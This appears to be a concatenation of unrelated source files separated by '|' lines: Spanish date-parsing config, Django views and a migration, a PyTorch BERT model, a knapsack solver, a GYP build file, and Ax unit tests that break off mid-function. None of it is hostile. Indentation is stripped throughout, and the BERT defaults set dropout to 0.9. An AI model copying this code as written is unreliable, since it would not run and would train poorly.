@property
def range_connector_symbol_regex(self) -> Pattern:
return self._range_connector_symbol_regex
@property
def utility_configuration(self) -> DateTimeUtilityConfiguration:
return self._utility_configuration
@property
def year_suffix(self) -> Pattern:
return self._year_suffix
@property
def more_than_regex(self) -> Pattern:
return self._more_than_regex
@property
def less_than_regex(self) -> Pattern:
return self._less_than_regex
@property
def in_connector_regex(self) -> Pattern:
return self._in_connector_regex
@property
def range_unit_regex(self) -> Pattern:
return self._range_unit_regex
@property
def since_year_suffix_regex(self) -> Pattern:
return self._since_year_suffix_regex
@property
def week_day_and_day_regex(self) -> Pattern:
return self._week_day_and_day_regex
def __init__(self):
self._check_both_before_after = False
if SpanishDateTime.DefaultLanguageFallback == Constants.DEFAULT_LANGUAGE_FALLBACK_DMY:
date_extractor_4 = SpanishDateTime.DateExtractor5
date_extractor_5 = SpanishDateTime.DateExtractor4
date_extractor_6 = SpanishDateTime.DateExtractor8
date_extractor_8 = SpanishDateTime.DateExtractor6
date_extractor_7 = SpanishDateTime.DateExtractor9
date_extractor_9 = SpanishDateTime.DateExtractor7
else:
date_extractor_4 = SpanishDateTime.DateExtractor4
date_extractor_5 = SpanishDateTime.DateExtractor5
date_extractor_6 = SpanishDateTime.DateExtractor6
date_extractor_8 = SpanishDateTime.DateExtractor8
date_extractor_7 = SpanishDateTime.DateExtractor7
date_extractor_9 = SpanishDateTime.DateExtractor9
self._date_regex_list = [
RegExpUtility.get_safe_reg_exp(SpanishDateTime.DateExtractor1),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.DateExtractor2),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.DateExtractor3),
RegExpUtility.get_safe_reg_exp(date_extractor_4),
RegExpUtility.get_safe_reg_exp(date_extractor_5),
RegExpUtility.get_safe_reg_exp(date_extractor_6),
RegExpUtility.get_safe_reg_exp(date_extractor_7),
RegExpUtility.get_safe_reg_exp(date_extractor_8),
RegExpUtility.get_safe_reg_exp(date_extractor_9),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.DateExtractor10),
]
self._implicit_date_list = [
RegExpUtility.get_safe_reg_exp(SpanishDateTime.OnRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.RelaxedOnRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.SpecialDayRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.ThisRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.LastDateRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.NextDateRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.WeekDayRegex),
RegExpUtility.get_safe_reg_exp(
SpanishDateTime.WeekDayOfMonthRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.SpecialDateRegex),
]
self._month_end = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.MonthEndRegex)
self._of_month = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.OfMonthRegex)
self._date_unit_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.DateUnitRegex)
self._for_the_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.ForTheRegex)
self._week_day_and_day_of_month_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.WeekDayAndDayOfMonthRegex)
self._relative_month_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.RelativeMonthRegex)
self._week_day_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.WeekDayRegex)
self._day_of_week = SpanishDateTime.DayOfWeek
self._ordinal_extractor = SpanishOrdinalExtractor()
self._integer_extractor = SpanishIntegerExtractor()
self._number_parser = BaseNumberParser(
SpanishNumberParserConfiguration())
self._duration_extractor = BaseDurationExtractor(
SpanishDurationExtractorConfiguration())
self._utility_configuration = SpanishDateTimeUtilityConfiguration()
self._range_connector_symbol_regex = RegExpUtility.get_safe_reg_exp(
BaseDateTime.RangeConnectorSymbolRegex
)
self._strict_relative_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.StrictRelativeRegex
)
self._year_suffix = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.YearSuffix
)
self._month_of_year = SpanishDateTime.MonthOfYear
self._prefix_article_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.PrefixArticleRegex
)
self._week_day_end = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.WeekDayEnd
)
self._more_than_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.MoreThanRegex
)
self._less_than_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.LessThanRegex
)
self._in_connector_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.InConnectorRegex
)
self._range_unit_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.RangeUnitRegex
)
self._since_year_suffix_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.SinceYearSuffixRegex
)
self._week_day_and_day_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.WeekDayAndDayRegex
)
self._week_day_start = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.WeekDayStart
)
self._check_both_before_after = SpanishDateTime.CheckBothBeforeAfter
|
from django.shortcuts import render
from .models import TimeSheet
def index(request):
TimeCards = TimeSheet.objects.all()
context = {'TimeCards': TimeCards}
return render(request, 'timecard_app/index.html', context)
# Leave the rest of the views (detail, results, vote) unchanged
|
import torch
import torch.nn as nn
import numpy as np
import json
class BertConfig(object):
def __init__(self,
vocab_size,
hidden_size=768,
num_hidden_layers=12,
num_attention_heads=12,
intermediate_size=3072,
hidden_act='gelu',
hidden_dropout_prob=0.9,
attention_dropout_prob=0.9,
max_seq_length=512,
type_vocab_size=16,
initialize_range=0.02):
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_dropout_prob = attention_dropout_prob
self.max_seq_length = max_seq_length
self.type_vocab_size = type_vocab_size
self.initialize_range = initialize_range
@classmethod
def from_json(cls, json_file):
with open(json_file, "r") as f:
config_dict = json.load(f)
config = BertConfig(vocab_size=None)
for key, value in config_dict.items():
config.__dict__[key] = value
return config
class Bert(nn.Module):
def __init__(self, config):
super(Bert, self).__init__()
self.config = config
self.tok_embedding = nn.Embedding(config.vocab_size, config.hidden_size)
self.pos_embedding = nn.Embedding(config.max_seq_length, config.hidden_size)
self.seg_embedding = nn.Embedding(config.type_vocab_size, config.hidden_size)
self.encoders = nn.ModuleList([
Encoder(
config.hidden_size,
config.num_attention_heads,
config.intermediate_size,
config.hidden_act,
config.hidden_dropout_prob,
config.attention_dropout_prob) for _ in range(config.num_hidden_layers)
])
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, x, mask, segment_ids):
batch_size, max_seq_length = x.shape
mask = mask.unsqueeze(1).repeat(1, max_seq_length, 1).unsqueeze(1)
te = self.tok_embedding(x)
pos = torch.arange(0, max_seq_length).unsqueeze(0).repeat(batch_size, 1)
pe = self.pos_embedding(pos)
se = self.seg_embedding(segment_ids)
x = te + pe + se
x = self.dropout(x)
for encoder in self.encoders:
x = encoder(x, mask)
return x
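# A hedged usage sketch (illustrative only, not part of the original module):
# build a small config and run one forward pass with random token ids, an
# all-ones attention mask (1 = attend, 0 = padding) and zeroed segment ids.
#
#     config = BertConfig(vocab_size=1000, hidden_size=64, num_hidden_layers=2,
#                         num_attention_heads=4, intermediate_size=128,
#                         max_seq_length=32)
#     model = Bert(config)
#     x = torch.randint(0, config.vocab_size, (2, 32))    # [batch, seq_len]
#     mask = torch.ones(2, 32, dtype=torch.long)
#     segment_ids = torch.zeros(2, 32, dtype=torch.long)
#     out = model(x, mask, segment_ids)                   # [2, 32, 64]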
class Encoder(nn.Module):
def __init__(self,
hidden_size,
num_attention_heads,
intermediate_size,
hidden_act,
hidden_dropout_prob,
attention_dropout_prob):
super(Encoder, self).__init__()
self.self_attention = MultiHeadAttention(hidden_size, num_attention_heads, attention_dropout_prob)
self.activation = nn.GELU() if hidden_act == 'gelu' else nn.Tanh()
self.ffn = nn.Sequential(nn.Linear(hidden_size, intermediate_size),
self.activation,
nn.Linear(intermediate_size,hidden_size))
self.layer_norm = nn.LayerNorm(hidden_size)
self.dropout = nn.Dropout(hidden_dropout_prob)
def forward(self, x, mask):
attention_output = self.self_attention(x, x, x, mask)
attention_output = self.layer_norm(x + self.dropout(attention_output))
encoder_output = self.ffn(attention_output)
encoder_output = self.layer_norm(attention_output + self.dropout(encoder_output))
return encoder_output
class MultiHeadAttention(nn.Module):
"""Multi-Head Attention Layer"""
def __init__(self, hidden_size, num_attention_heads, attention_dropout_prob):
super(MultiHeadAttention, self).__init__()
self.h = num_attention_heads
self.d_k = hidden_size // num_attention_heads
self.w_q = nn.Linear(hidden_size, hidden_size)
self.w_k = nn.Linear(hidden_size, hidden_size)
self.w_v = nn.Linear(hidden_size, hidden_size)
self.w_o = nn.Linear(hidden_size, hidden_size)
self.dropout = nn.Dropout(attention_dropout_prob)
def forward(self, query, key, value, mask=None):
# q, k, v = [batch_size, src_len, hidden_size]
batch_size, hidden_size = query.shape[0], query.shape[2]
# q, k, v = [batch_size, src_len, hidden_size]
q = self.w_q(query)
k = self.w_k(key)
v = self.w_v(value)
# q, v = [batch_size, num_attention_heads, src_len, head_size]
# k = [batch_size, num_attention_heads, head_size, src_len]
q = q.view(batch_size, -1, self.h, self.d_k).permute(0, 2, 1, 3)
k = k.view(batch_size, -1, self.h, self.d_k).permute(0, 2, 3, 1)
v = v.view(batch_size, -1, self.h, self.d_k).permute(0, 2, 1, 3)
# Attention(Q, K, V) = Softmax(Q * K^T / sqrt(d_k)) * V
attention_scores = torch.matmul(q, k) / np.sqrt(self.d_k)
if mask is not None:
attention_scores = attention_scores.masked_fill(mask == 0, -1e4)
attention_probs = torch.softmax(attention_scores, dim=-1)
attention_probs = self.dropout(attention_probs)
y = torch.matmul(attention_probs, v)
# y = [batch_size, src_len, hidden_size]
y = y.permute(0, 2, 1, 3).contiguous().view(batch_size, -1, hidden_size)
return self.w_o(y)
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Mtaa.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
# Uses python3
import sys
def get_optimal_value(capacity, weights, values):
value = 0.
# get value per unit
v_u = [(v, w, v/w) for w, v in zip(weights, values)]
v_u = sorted(v_u, key=lambda x: x[2], reverse = True)
for idx in range(len(v_u)):
if capacity == 0:
return value
a = min(v_u[idx][1], capacity)
value = value + a*v_u[idx][2]
capacity -= a
return value
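# Worked example (illustrative): with capacity 50, weights [20, 50, 30] and
# values [60, 100, 120], the greedy choice by value-per-unit takes all of the
# third item (ratio 4) and all of the first item (ratio 3), filling the
# capacity exactly, so:
#     get_optimal_value(50, [20, 50, 30], [60, 100, 120])  # -> 180.0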
if __name__ == "__main__":
data = list(map(int, sys.stdin.read().split()))
n, capacity = data[0:2]
values = data[2:(2 * n + 2):2]
weights = data[3:(2 * n + 2):2]
opt_value = get_optimal_value(capacity, weights, values)
print("{:.10f}".format(opt_value))
|
# Generated by Django 3.1.13 on 2022-02-01 18:52
from django.db import migrations, models
import skills_matcher_db.users.models
class Migration(migrations.Migration):
dependencies = [
('users', '0012_auto_20220128_1918'),
]
operations = [
migrations.AlterField(
model_name='user',
name='user_type',
field=skills_matcher_db.users.models.ChoiceArrayField(base_field=models.CharField(blank=True, choices=[('EXPERT', 'Expert'), ('ENGINEER', 'Engineer'), ('PROJECT_OWNER', 'Project Owner')], max_length=50), blank=True, null=True, size=None),
),
]
|
# GYP file to build a V8 sample.
{
'targets': [
{
'target_name': 'SkV8Example',
'type': 'executable',
'mac_bundle' : 1,
'include_dirs' : [
'../third_party/externals/v8/include',
],
'sources': [
'../experimental/SkV8Example/BaseContext.cpp',
'../experimental/SkV8Example/BaseContext.h',
'../experimental/SkV8Example/Global.cpp',
'../experimental/SkV8Example/Global.h',
'../experimental/SkV8Example/JsContext.cpp',
'../experimental/SkV8Example/JsContext.h',
'../experimental/SkV8Example/Path2D.cpp',
'../experimental/SkV8Example/Path2D.h',
'../experimental/SkV8Example/SkV8Example.cpp',
'../experimental/SkV8Example/SkV8Example.h',
],
'dependencies': [
'flags.gyp:flags',
'skia_lib.gyp:skia_lib',
'views.gyp:views',
'xml.gyp:xml',
],
'link_settings': {
'libraries': [
# 'd:/src/v8/build/Debug/lib/v8_base.ia32.lib',
# 'd:/src/v8/build/Debug/lib/v8_snapshot.lib',
# 'd:/src/v8/build/Debug/lib/icuuc.lib',
# 'd:/src/v8/build/Debug/lib/icui18n.lib',
# 'Ws2_32.lib',
# 'Winmm.lib',
'-lpthread',
'-lrt',
'../../third_party/externals/v8/out/native/obj.target/tools/gyp/libv8_base.x64.a',
'../../third_party/externals/v8/out/native/obj.target/tools/gyp/libv8_snapshot.a',
'../../third_party/externals/v8/out/native/obj.target/third_party/icu/libicudata.a',
'../../third_party/externals/v8/out/native/obj.target/third_party/icu/libicui18n.a',
'../../third_party/externals/v8/out/native/obj.target/third_party/icu/libicuuc.a',
'../../third_party/externals/v8/out/native/obj.target/icudata/third_party/icu/linux/icudt46l_dat.o',
],
},
'conditions' : [
[ 'skia_gpu == 1', {
'include_dirs' : [
'../src/gpu',
]
}],
[ 'skia_os == "win"', {
'sources' : [
'../src/views/win/SkOSWindow_Win.cpp',
'../src/views/win/skia_win.cpp',
],
}],
[ 'skia_os == "mac"', {
'sources': [
'../src/views/mac/SampleAppDelegate.h',
'../src/views/mac/SampleAppDelegate.mm',
'../src/views/mac/SkEventNotifier.mm',
'../src/views/mac/skia_mac.mm',
'../src/views/mac/SkNSView.h',
'../src/views/mac/SkNSView.mm',
'../src/views/mac/SkOptionsTableView.h',
'../src/views/mac/SkOptionsTableView.mm',
'../src/views/mac/SkOSWindow_Mac.mm',
'../src/views/mac/SkTextFieldCell.h',
'../src/views/mac/SkTextFieldCell.m',
],
'include_dirs' : [
'../src/views/mac/'
],
'xcode_settings' : {
'INFOPLIST_FILE' : '../experimental/SkiaExamples/SkiaExamples-Info.plist',
},
'mac_bundle_resources' : [
'../experimental/SkiaExamples/SkiaExamples.xib'
],
}],
],
}
],
}
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import json
from unittest.mock import Mock, PropertyMock
import numpy as np
import pandas as pd
from ax.core.arm import Arm
from ax.core.base_trial import TrialStatus
from ax.core.batch_trial import BatchTrial
from ax.core.data import Data
from ax.core.generator_run import GeneratorRun
from ax.core.map_data import MapData, MapKeyInfo
from ax.core.observation import (
Observation,
ObservationData,
ObservationFeatures,
observations_from_data,
observations_from_map_data,
separate_observations,
)
from ax.core.trial import Trial
from ax.utils.common.testutils import TestCase
class ObservationsTest(TestCase):
def testObservationFeatures(self):
t = np.datetime64("now")
attrs = {
"parameters": {"x": 0, "y": "a"},
"trial_index": 2,
"start_time": t,
"end_time": t,
"random_split": 1,
}
obsf = ObservationFeatures(**attrs)
for k, v in attrs.items():
self.assertEqual(getattr(obsf, k), v)
printstr = "ObservationFeatures(parameters={'x': 0, 'y': 'a'}, "
printstr += "trial_index=2, "
printstr += "start_time={t}, end_time={t}, ".format(t=t)
printstr += "random_split=1)"
self.assertEqual(repr(obsf), printstr)
obsf2 = ObservationFeatures(**attrs)
self.assertEqual(hash(obsf), hash(obsf2))
a = {obsf, obsf2}
self.assertEqual(len(a), 1)
self.assertEqual(obsf, obsf2)
attrs.pop("trial_index")
obsf3 = ObservationFeatures(**attrs)
self.assertNotEqual(obsf, obsf3)
self.assertFalse(obsf == 1)
def testClone(self):
# Test simple cloning.
arm = Arm({"x": 0, "y": "a"})
obsf = ObservationFeatures.from_arm(arm, trial_index=3)
self.assertIsNot(obsf, obsf.clone())
self.assertEqual(obsf, obsf.clone())
# Test cloning with swapping parameters.
clone_with_new_params = obsf.clone(replace_parameters={"x": 1, "y": "b"})
self.assertNotEqual(obsf, clone_with_new_params)
obsf.parameters = {"x": 1, "y": "b"}
self.assertEqual(obsf, clone_with_new_params)
def testObservationFeaturesFromArm(self):
arm = Arm({"x": 0, "y": "a"})
obsf = ObservationFeatures.from_arm(arm, trial_index=3)
self.assertEqual(obsf.parameters, arm.parameters)
self.assertEqual(obsf.trial_index, 3)
def testUpdateFeatures(self):
parameters = {"x": 0, "y": "a"}
new_parameters = {"z": "foo"}
obsf = ObservationFeatures(parameters=parameters, trial_index=3)
# Ensure None trial_index doesn't override existing value
obsf.update_features(ObservationFeatures(parameters={}))
self.assertEqual(obsf.trial_index, 3)
# Test override
new_obsf = ObservationFeatures(
parameters=new_parameters,
trial_index=4,
start_time=pd.Timestamp("2005-02-25"),
end_time=pd.Timestamp("2005-02-26"),
random_split=7,
)
obsf.update_features(new_obsf)
self.assertEqual(obsf.parameters, {**parameters, **new_parameters})
self.assertEqual(obsf.trial_index, 4)
self.assertEqual(obsf.random_split, 7)
self.assertEqual(obsf.start_time, pd.Timestamp("2005-02-25"))
self.assertEqual(obsf.end_time, pd.Timestamp("2005-02-26"))
def testObservationData(self):
attrs = {
"metric_names": ["a", "b"],
"means": np.array([4.0, 5.0]),
"covariance": np.array([[1.0, 4.0], [3.0, 6.0]]),
}
obsd = ObservationData(**attrs)
self.assertEqual(obsd.metric_names, attrs["metric_names"])
self.assertTrue(np.array_equal(obsd.means, attrs["means"]))
self.assertTrue(np.array_equal(obsd.covariance, attrs["covariance"]))
# use legacy printing for numpy (<= 1.13 add spaces in front of floats;
# to get around tests failing on older versions, peg version to 1.13)
if np.__version__ >= "1.14":
np.set_printoptions(legacy="1.13")
printstr = "ObservationData(metric_names=['a', 'b'], means=[ 4. 5.], "
printstr += "covariance=[[ 1. 4.]\n [ 3. 6.]])"
self.assertEqual(repr(obsd), printstr)
self.assertEqual(obsd.means_dict, {"a": 4.0, "b": 5.0})
self.assertEqual(
obsd.covariance_matrix,
{"a": {"a": 1.0, "b": 4.0}, "b": {"a": 3.0, "b": 6.0}},
)
def testObservationDataValidation(self):
with self.assertRaises(ValueError):
ObservationData(
metric_names=["a", "b"],
means=np.array([4.0]),
covariance=np.array([[1.0, 4.0], [3.0, 6.0]]),
)
with self.assertRaises(ValueError):
ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([1.0, 4.0]),
)
def testObservationDataEq(self):
od1 = ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([[1.0, 4.0], [3.0, 6.0]]),
)
od2 = ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([[1.0, 4.0], [3.0, 6.0]]),
)
od3 = ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([[2.0, 4.0], [3.0, 6.0]]),
)
self.assertEqual(od1, od2)
self.assertNotEqual(od1, od3)
self.assertFalse(od1 == 1)
def testObservation(self):
obs = Observation(
features=ObservationFeatures(parameters={"x": 20}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
self.assertEqual(obs.features, ObservationFeatures(parameters={"x": 20}))
self.assertEqual(
obs.data,
ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
)
self.assertEqual(obs.arm_name, "0_0")
obs2 = Observation(
features=ObservationFeatures(parameters={"x": 20}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
self.assertEqual(obs, obs2)
obs3 = Observation(
features=ObservationFeatures(parameters={"x": 10}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
self.assertNotEqual(obs, obs3)
self.assertNotEqual(obs, 1)
def testObservationsFromData(self):
truth = [
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
},
{
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b"},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
},
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
},
]
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for obs in truth
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for obs in truth
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(truth)[
["arm_name", "trial_index", "mean", "sem", "metric_name"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
self.assertEqual(len(observations), 2)
# Get them in the order we want for tests below
if observations[0].features.parameters["x"] == 1:
observations.reverse()
obsd_truth = {
"metric_names": [["a", "b"], ["a"]],
"means": [np.array([2.0, 4.0]), np.array([3])],
"covariance": [np.diag([4.0, 16.0]), np.array([[9.0]])],
}
cname_truth = ["0_0", "0_1"]
for i, obs in enumerate(observations):
self.assertEqual(obs.features.parameters, truth[i]["parameters"])
self.assertEqual(obs.features.trial_index, truth[i]["trial_index"])
self.assertEqual(obs.data.metric_names, obsd_truth["metric_names"][i])
self.assertTrue(np.array_equal(obs.data.means, obsd_truth["means"][i]))
self.assertTrue(
np.array_equal(obs.data.covariance, obsd_truth["covariance"][i])
)
self.assertEqual(obs.arm_name, cname_truth[i])
def testObservationsFromDataWithFidelities(self):
truth = {
0.5: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
"fidelities": json.dumps({"z": 0.5}),
"updated_parameters": {"x": 0, "y": "a", "z": 0.5},
"mean_t": np.array([2.0]),
"covariance_t": np.array([[4.0]]),
},
0.25: {
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b", "z": 0.5},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"fidelities": json.dumps({"z": 0.25}),
"updated_parameters": {"x": 1, "y": "b", "z": 0.25},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
},
1: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"fidelities": json.dumps({"z": 1}),
"updated_parameters": {"x": 0, "y": "a", "z": 1},
"mean_t": np.array([4.0]),
"covariance_t": np.array([[16.0]]),
},
}
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for _, obs in truth.items()
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for _, obs in truth.items()
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(list(truth.values()))[
["arm_name", "trial_index", "mean", "sem", "metric_name", "fidelities"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
self.assertEqual(len(observations), 3)
for obs in observations:
t = truth[obs.features.parameters["z"]]
self.assertEqual(obs.features.parameters, t["updated_parameters"])
self.assertEqual(obs.features.trial_index, t["trial_index"])
self.assertEqual(obs.data.metric_names, [t["metric_name"]])
self.assertTrue(np.array_equal(obs.data.means, t["mean_t"]))
self.assertTrue(np.array_equal(obs.data.covariance, t["covariance_t"]))
self.assertEqual(obs.arm_name, t["arm_name"])
def testObservationsFromMapData(self):
truth = {
0.5: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
"updated_parameters": {"x": 0, "y": "a", "z": 0.5},
"mean_t": np.array([2.0]),
"covariance_t": np.array([[4.0]]),
"z": 0.5,
"timestamp": 50,
},
0.25: {
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b", "z": 0.5},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"updated_parameters": {"x": 1, "y": "b", "z": 0.25},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
"z": 0.25,
"timestamp": 25,
},
1: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"updated_parameters": {"x": 0, "y": "a", "z": 1},
"mean_t": np.array([4.0]),
"covariance_t": np.array([[16.0]]),
"z": 1,
"timestamp": 100,
},
}
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for _, obs in truth.items()
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for _, obs in truth.items()
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(list(truth.values()))[
["arm_name", "trial_index", "mean", "sem", "metric_name", "z", "timestamp"]
]
data = MapData(
df=df,
map_key_infos=[
MapKeyInfo(key="z", default_value=0.0),
MapKeyInfo(key="timestamp", default_value=0.0),
],
)
observations = observations_from_map_data(experiment, data)
self.assertEqual(len(observations), 3)
for obs in observations:
t = truth[obs.features.parameters["z"]]
self.assertEqual(obs.features.parameters, t["updated_parameters"])
self.assertEqual(obs.features.trial_index, t["trial_index"])
self.assertEqual(obs.data.metric_names, [t["metric_name"]])
self.assertTrue(np.array_equal(obs.data.means, t["mean_t"]))
self.assertTrue(np.array_equal(obs.data.covariance, t["covariance_t"]))
self.assertEqual(obs.arm_name, t["arm_name"])
self.assertEqual(obs.features.metadata, {"timestamp": t["timestamp"]})
def testObservationsFromDataAbandoned(self):
truth = {
0.5: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 2.0,
"sem": 2.0,
"trial_index": 0,
"metric_name": "a",
"updated_parameters": {"x": 0, "y": "a", "z": 0.5},
"mean_t": np.array([2.0]),
"covariance_t": np.array([[4.0]]),
"z": 0.5,
"timestamp": 50,
},
1: {
"arm_name": "1_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"updated_parameters": {"x": 0, "y": "a", "z": 1},
"mean_t": np.array([4.0]),
"covariance_t": np.array([[16.0]]),
"z": 1,
"timestamp": 100,
},
0.25: {
"arm_name": "2_0",
"parameters": {"x": 1, "y": "a", "z": 0.5},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"updated_parameters": {"x": 1, "y": "b", "z": 0.25},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
"z": 0.25,
"timestamp": 25,
},
0.75: {
"arm_name": "2_1",
"parameters": {"x": 1, "y": "b", "z": 0.75},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"updated_parameters": {"x": 1, "y": "b", "z": 0.75},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
"z": 0.75,
"timestamp": 25,
},
}
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for _, obs in truth.items()
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: (
Trial(experiment, GeneratorRun(arms=[arms[obs["arm_name"]]]))
)
for _, obs in list(truth.items())[:-1]
if not obs["arm_name"].startswith("2")
}
batch = BatchTrial(experiment, GeneratorRun(arms=[arms["2_0"], arms["2_1"]]))
trials.update({2: batch})
trials.get(1).mark_abandoned()
trials.get(2).mark_arm_abandoned(arm_name="2_1")
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(list(truth.values()))[
["arm_name", "trial_index", "mean", "sem", "metric_name"]
]
data = Data(df=df)
# 1 arm is abandoned and 1 trial is abandoned, so only 2 observations should be
# included.
obs_no_abandoned = observations_from_data(experiment, data)
self.assertEqual(len(obs_no_abandoned), 2)
# With include_abandoned=True, the abandoned arm and the abandoned trial are
# kept, so all 4 observations should be included.
obs_with_abandoned = observations_from_data(
experiment, data, include_abandoned=True
)
self.assertEqual(len(obs_with_abandoned), 4)
def testObservationsFromDataWithSomeMissingTimes(self):
truth = [
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
"start_time": 0,
},
{
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b"},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"start_time": 0,
},
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"start_time": None,
},
{
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b"},
"mean": 5.0,
"sem": 5.0,
"trial_index": 2,
"metric_name": "b",
"start_time": None,
},
]
arms = {
